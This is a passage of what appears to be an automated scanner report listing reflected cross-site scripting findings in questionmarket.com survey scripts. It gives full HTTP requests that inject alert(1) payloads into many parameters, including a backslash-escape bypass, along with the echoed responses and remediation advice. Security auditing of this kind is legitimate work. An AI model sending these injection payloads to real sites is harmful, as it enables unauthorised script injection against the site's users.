Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:43:09 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: LP=1316270589; expires=Wed, 21 Sep 2011 18:43:09 GMT; path=/; domain=.questionmarket.com
Content-Length: 903
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=032c0c"-alert(1)-"2e42895c328&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==";
try{
   if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && wind
...[SNIP]...

5.3. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b55c9"-alert(1)-"21a641c0750 was submitted in the code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738b55c9"-alert(1)-"21a641c0750&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:40:49 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: LP=1316270449; expires=Wed, 21 Sep 2011 18:40:49 GMT; path=/; domain=.questionmarket.com
Content-Length: 931
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738b55c9"-alert(1)-"21a641c0750&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==";
try{
   if (s.search('d_layer') && (wi
...[SNIP]...

5.4. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b583"-alert(1)-"755f4a4ca6f was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=2b583"-alert(1)-"755f4a4ca6f&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:42:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: LP=1316270560; expires=Wed, 21 Sep 2011 18:42:40 GMT; path=/; domain=.questionmarket.com
Content-Length: 903
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=2b583"-alert(1)-"755f4a4ca6f&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==";
try{
   if (s.search('d_layer') && (window['$WLXRmAd'] || (win
...[SNIP]...

5.5. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf150"-alert(1)-"276604bd11b was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==cf150"-alert(1)-"276604bd11b HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:44:25 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1316270665; expires=Wed, 21 Sep 2011 18:44:25 GMT; path=/; domain=.questionmarket.com
Content-Length: 903
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==cf150"-alert(1)-"276604bd11b";
try{
   if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       s=s.replace('d_layer','h_layer');
       d=document;
       h=true;
   } else {
       d=top.document;
   }
}
...[SNIP]...

5.6. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2908"-alert(1)-"6e1ffc1ebb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==&f2908"-alert(1)-"6e1ffc1ebb0=1 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a211
Set-Cookie: LP=1316270822; expires=Wed, 21-Sep-2011 18:47:02 GMT; path=/; domain=.questionmarket.com
Content-Length: 906
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==&f2908"-alert(1)-"6e1ffc1ebb0=1";
try{
   if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       s=s.replace('d_layer','h_layer');
       d=document;
       h=true;
   } else {
       d=top.document;
   }

...[SNIP]...

5.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [noiframe parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the noiframe request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1b5"-alert(1)-"ced91aa03e8 was submitted in the noiframe parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1ad1b5"-alert(1)-"ced91aa03e8&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:43:47 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: LP=1316270627; expires=Wed, 21 Sep 2011 18:43:47 GMT; path=/; domain=.questionmarket.com
Content-Length: 903
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1ad1b5"-alert(1)-"ced91aa03e8&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==";
try{
   if (s.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['
...[SNIP]...

5.8. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fede"-alert(1)-"2ee520ed36a was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=11fede"-alert(1)-"2ee520ed36a&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:27 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1316270487; expires=Wed, 21 Sep 2011 18:41:27 GMT; path=/; domain=.questionmarket.com
Content-Length: 903
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=11fede"-alert(1)-"2ee520ed36a&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==";
try{
   if (s.search('d_layer') && (window
...[SNIP]...

5.9. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the protocol request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 602cc"%3balert(1)//13596a6aef9 was submitted in the protocol parameter. This input was echoed as 602cc";alert(1)//13596a6aef9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http602cc"%3balert(1)//13596a6aef9&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:42:03 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1316270523; expires=Wed, 21 Sep 2011 18:42:03 GMT; path=/; domain=.questionmarket.com
Content-Length: 933
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http602cc";alert(1)//13596a6aef9://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http602cc"%3balert(1)//13596a6aef9&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDo
...[SNIP]...

5.10. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 369be"-alert(1)-"d94f7c831e7 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10369be"-alert(1)-"d94f7c831e7&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:40:09 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1316270409; expires=Wed, 21 Sep 2011 18:40:09 GMT; path=/; domain=.questionmarket.com
Content-Length: 906
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10369be"-alert(1)-"d94f7c831e7&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg==";
try{
   if (s.search('d_la
...[SNIP]...

5.11. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/surv_lastpage_disq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33fea\'%3balert(1)//008a4b6b504 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33fea\\';alert(1)//008a4b6b504 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destina/33fea\'%3balert(1)//008a4b6b504tion HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:21 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Set-Cookie: veranda_ses=deleted; expires=Fri, 17-Sep-2010 14:47:20 GMT; path=/; domain=.questionmarket.com
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 385
Content-Type: text/html

(function(){
if (self==top) {
   if (window.opener)
       document.write('<a href="javascript:window.close()">Click to Close</a>');
} else {
       document.write('<a href="http://amch.questionmarket.com/adscgen/endsurvey_disq.php">Continue to your destina/33fea\\';alert(1)//008a4b6b504tion</a>
...[SNIP]...

5.12. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/surv_lastpage_disq.php

Issue detail

The value of the p1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28379\'%3balert(1)//48eea5b6e22 was submitted in the p1 parameter. This input was echoed as 28379\\';alert(1)//48eea5b6e22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

